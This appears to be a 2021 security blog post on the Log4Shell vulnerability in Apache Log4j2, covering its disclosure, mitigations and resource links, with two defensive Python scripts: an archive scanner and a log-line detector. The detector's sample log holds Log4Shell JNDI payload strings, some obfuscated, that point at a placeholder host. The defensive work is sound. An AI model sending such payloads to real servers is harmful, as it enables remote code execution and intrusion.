//Blogs - 15 Dec 2021
Picture credit : Lunasec
Patch, check your patches work, check logs for attempts and possible compromise.
Log4Shell is the name Lunasec used for the vulnerability in Apache Log4j2 that was disclosed abruptly via a tweet and a GitHub repo.
This sudden announcement left security professionals with a short time frame in which to protect systems before other interested parties could discover, compromise and potentially take over them.
Among the security groups alerted this way were computer emergency response teams, which recognised the impact and issued early advisories that are either still being updated or are being referenced by newer advisories.
The attack surface was of prime concern, and security professionals exchanged ways to detect it, including via various third-party search results. One of the attack-surface lists published early showed that Log4Shell (also called LogJam) would affect a large number of systems. Ways to detect affected servers were refined into a script, and other entities released tools to detect vulnerable servers through first-party scanning. First-party scanning is not a concern, but unauthorised second-party scanning is; this activity was eventually detected, and exploit payloads soon followed.
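As an added example of first-party checking (not code from the original post or from any of the tools linked below), a small script that inspects the archives on a host: it reads the log4j-core version from the bundled Maven metadata, records whether the JndiLookup class is present, and descends one level into WAR/EAR bundles. It assumes the fix release is 2.15.0, the version the PSIRT links on this page refer to; adjust FIXED_VERSION to whatever the current advisory requires.

```python
"""Offline check of JAR/WAR archives for a bundled, vulnerable log4j-core (CVE-2021-44228)."""
import io, os, re, zipfile
FIXED_VERSION = (2, 15, 0)  # assumption: fix release taken as 2.15.0, the version the page's PSIRT links refer to
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def parse_version(text):
    # '2.15.0-rc2' -> (2, 15, 0); a release-candidate suffix is ignored for the comparison
    return tuple(int(p) for p in text.strip().split("-")[0].split("."))

def inspect_jar(source, depth=0):
    """log4j-core version and state, or None; source is a path or file object, nested JARs searched one level."""
    with zipfile.ZipFile(source) as jar:
        names = set(jar.namelist())
        if POM_PROPS in names:
            props = jar.read(POM_PROPS).decode("utf-8", "replace")
            match = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = parse_version(match.group(1)) if match else None
            has_jndi = JNDI_CLASS in names  # removing this class is one documented mitigation
            return {"version": version, "jndi_lookup_present": has_jndi,
                    "vulnerable": has_jndi and (version is None or version < FIXED_VERSION)}
        if depth < 1:  # e.g. WEB-INF/lib/log4j-core-*.jar inside a WAR
            for entry in names:
                if entry.lower().endswith(".jar"):
                    found = inspect_jar(io.BytesIO(jar.read(entry)), depth + 1)
                    if found:
                        return found
    return None

def scan_tree(root):
    """Walk a directory and list every archive that bundles a vulnerable log4j-core."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, name)
                try:
                    info = inspect_jar(path)
                except zipfile.BadZipFile:
                    continue  # not a real archive; skip it
                if info and info["vulnerable"]:
                    findings.append((path, info))
    return findings

def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed in-memory archive for demonstration only; not a real log4j release."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not real bytecode
    return io.BytesIO(buf.getvalue())
```

Run `scan_tree("/path/to/app")` on a host to list archives that still bundle a vulnerable log4j-core; the version check alone is not enough once the JndiLookup class has been removed, which is why both are reported.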
The manner in which the vulnerability was disclosed left a short time frame for naming and grading it. This was evident in that the PSIRT initially only had release candidates available; these were later checked, and it was reported that both had to be used.
The vulnerability was later allocated CVE-2021-44228 and carried the PSIRT's analysis of a CVSSv3 base score of a perfect 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Before a full patch was available from the PSIRT, mitigations were collated and a "vaccine" was made available as an easy way to mitigate the unauthorised second-party scanning attempts that tried to drop a malicious payload.
No doubt more numerous and extensive reports will be made available by noted security organisations, along with a plethora of helpful resources, but the advice right now is the TLDR: check your version, patch, check your patch, check your logs for attempts and possible compromise, and take remediation steps if any IoCs show up.
In a span of no more than a week, CVE-2021-44228 has gone from a proof-of-concept drop, to internet-wide scans, to carrying crypto-coin miner payloads, to now being found carrying ransomware payloads.
Finally, if your weekend felt hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers who maintain a piece of code that the internet has come to depend on so much. These three volunteers have worked very hard to get us a patch as soon as possible.
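As an added example of the "check your logs for attempts" step (not code from the original post or from any of the detectors linked below), a small scanner that undoes URL-encoding and flattens nested lookups before searching access-log lines for a JNDI lookup, so that lightly disguised attempts are still flagged. The sample log lines are constructed for the demonstration and the hostnames are placeholders.

```python
"""Flag Log4Shell-style lookup attempts in log lines, including common obfuscations."""
import re
import urllib.parse

# Nested lookups used to hide the keyword, e.g. ${lower:j} or ${::-j}; the group captures the literal.
NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(line):
    """Undo URL-encoding and flatten nested lookups until the text stops changing."""
    previous = None
    while previous != line:
        previous = line
        line = urllib.parse.unquote(line)
        line = NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), line)
    return line.lower()


def is_attempt(line):
    """True if the normalised line still contains a ${jndi: lookup."""
    return JNDI.search(normalise(line)) is not None


def scan(lines):
    """Return (line_number, normalised_line) for every line that looks like an attempt."""
    return [(n, normalise(line)) for n, line in enumerate(lines, 1) if is_attempt(line)]


# Constructed access-log lines for demonstration (not captured traffic); hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example.invalid/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:01:09 +0000] "GET /?x=${${lower:j}${lower:n}di:rmi://scanner.example.invalid/b} HTTP/1.1" 404 0',
    '203.0.113.9 - - [12/Dec/2021:10:01:11 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example.invalid%2Fc%7D HTTP/1.1" 404 0',
    '203.0.113.9 - - [12/Dec/2021:10:01:14 +0000] "GET /?x=${${::-j}${::-n}di:dns://scanner.example.invalid/d} HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, text in scan(SAMPLE_LOG):
        print(f"line {number}: {text}")
```

A hit only shows that an attempt reached the server; whether it succeeded has to be confirmed from outbound connections and the IoC lists linked below.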
We would also like to thank all the contributors who made this article possible by submitting relevant links and articles to us.
 Lunasec Advisory https://www.lunasec.io/docs/blog/log4j-zero-day/
 Tweeted 0-Day https://twitter.com/P0rZ9/status/1468949890571337731
 NZCERT https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
 AusCERT ASB https://auscert.org.au/bulletins/ASB-2021.0244.2
 SingCERT https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070
 AusCERT ESB https://www.auscert.org.au/bulletins/ESB-2021.4186
 Attack Surface https://github.com/YfryTchsGD/Log4jAttackSurface
 Randori Blog https://www.randori.com/blog/cve-2021-44228/
 log4j_rce_check https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
 Log4j2Scan https://github.com/whwlsfb/Log4j2Scan
 Qualys Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell
 SocPrime https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/
 Imperva https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/
 Log4j RCE Attempts https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
 Cloudflare Blog https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
 PSIRT rc1 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
 PSIRT rc2 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
 CyberKendra https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
 NVDB https://nvd.nist.gov/vuln/detail/CVE-2021-44228
 RecordedMedia https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/
 PSIRT Advisory https://logging.apache.org/log4j/2.x/security.html
 PSIRT Download https://logging.apache.org/log4j/2.x/download.html
 Cybereason Blog https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228
 Cybereason Vax https://github.com/Cybereason/Logout4Shell
 DarkReading https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates
 PaloAlto https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
 Cloudflare Blog https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
 Cloudflare Blog https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
 Sygnia Advisory https://blog.sygnia.co/log4shell-remote-code-execution-advisory
 ISC SANS Diary https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/
 ISC SANS Diary https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
 Crowdstrike https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
 Bleeping Computer https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
 Trusted Sec https://www.trustedsec.com/blog/log4j-playbook/
 Bleeping Computer https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
 Reddit List of resources on log4j https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/
 CVE-2021-44228-Log4Shell-Hashes https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
 NCSC-NL https://github.com/NCSC-NL/log4shell
 BlueTeam CheatSheet https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
 Log4ShellDetector https://github.com/Neo23x0/log4shell-detector
 Bazaar https://bazaar.abuse.ch/browse/tag/log4j
 URLHaus https://urlhaus.abuse.ch/browse/tag/log4j
 Threatfox https://threatfox.abuse.ch/browse/tag/log4j
 CuratedIntel https://github.com/curated-intel/Log4Shell-IOCs
 Microsoft Guidance https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
 TryHackme https://tryhackme.com/room/solar
 Twitter https://twitter.com/80vul/status/1470272820571963392?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet
 Twitter https://twitter.com/ankit_anubhav/status/1470648109625536515
 Twitter “@FiloSottile” https://twitter.com/FiloSottile/status/1469441487175880711
 Twitter “@matthew_d_green” https://twitter.com/matthew_d_green/status/1469715416549367812
 ITNews https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914